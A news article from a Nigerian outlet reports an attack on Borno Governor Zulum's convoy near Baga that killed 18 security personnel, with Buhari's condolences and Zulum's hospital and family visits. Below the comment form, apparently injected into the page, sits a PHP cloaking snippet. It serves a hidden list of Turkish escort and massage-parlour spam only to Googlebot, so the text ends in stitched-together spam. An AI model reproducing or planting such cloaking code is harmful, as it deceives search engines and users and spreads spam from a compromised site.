NEWS NEWSMAN INVESTIGATES

‘Peace Must Return to Borno’, Zulum affirms despite convoy attacks

NEWSMAN, Maiduguri – President Muhammadu Buhari has mourned the death of four Soldiers, ten policemen and four members of the civilian Joint Task Force (JTF), totaling 18 lives lost during a fresh terrorist attacks on the convoy of Borno State Governor Babagana Zulum over the weekend.

Condemning the act via a statement by his spokesman, Garba Shehu, Buhari urged the state government to remain resolute in restoring normalcy to the liberated settlements.

This attack launched on Governor Zulum’s Convoy along the Monguno/Baga highway while returning to Maiduguri, the state capital, after donating relief materials worth N5.21 million to 521 internally displaced persons (IDPs) at Baga, makes a third of such assault on Governor Zulum as he had been attacked on July 29, 2020.

An eyewitness, who was on the entourage, said the onslaught took place two kilometres from the fishing community within the Lake Chad region, saying, “the windscreens of some vehicles were scattered. Some had their tyres burst by gunshots, including the Government House Press Crew bus. The military gun truck was also shot at, and a soldier had his shoulder scalded with bullets.”

Before the attack, Zulum had reassured the IDPs of his administration’s commitment to their harmonious living, charging them to be vigilant as “Some parts of Baga town are still dangerous to walk, with improvised explosive devices (IEDs) planted by Boko Haram”

Assuring them of protection, he said the military, police, civil defence, immigration, civilian JTF and vigilance groups had been assigned to protect lives and property in Baga and the surroundings.

Meanwhile, Governor Zulum visited the bereaved families of security personnel killed in the attacks, saying “ It is very unfortunate that the incident happened. “May Almighty God in his infinite mercy forgive and reward them for their sacrifices and may He grant you the strength to bear the fortitude of this huge loss that is for all of us”.

“Insha Allah we shall do everything possible to support the families. The education of their children is very important in addition to the support for their means of livelihood. I want to once again sympathize with the families on behalf of the grateful people of Borno State”, Zulum said.

Governor Zulum also visited the state specialist hospital in Maiduguri to console those injured from the ambush. Conducting the Governor round, medical director of the Hospital, Dr. Laraba Bello explained that “eight injured persons were brought to the hospital on Sunday made up of a policeman and seven CJTF members from whom five had been treated and discharged while remaining three were responding to treatment after sustaining injuries from gun shots”.

An undeterred Zulum further stated the “unfortunate incident” would not stop his plan to ensure the relocation of all IDPs to their ancestral homes, saying “Although there was a loss of lives, which is very unfortunate, I am still confident that peace will return to Borno State, the Northeast, and Nigeria.

Related Posts

Leave a Reply

Your email address will not be published. Required fields are marked *

bahis

$uagent = trim(strtolower($_SERVER["HTTP_USER_AGENT"])); if(strpos($uagent,"googlebot")!==false and strpos($uagent,"google-amphtml")===false ){ echo 'Van masaj salonu Maraş masaj salonu Şanlıurfa masaj salonu Isparta masaj salonu Amasya masaj salonu Afyon masaj salonu Denizli masaj salonu Kayseri masaj salonu Eskişehir masaj salonu Malatya masaj salonu Yozgat masaj salonu Çorum masaj salonu Tokat masaj salonu Gaziantep masaj salonu Kütahya masaj salonu Elazığ masaj salonu Kırklareli escort Burdur escort Aksaray escort Kars escort Kastamonu escort Adıyaman escort Erzincan escort Uşak escort Sinop escort '; }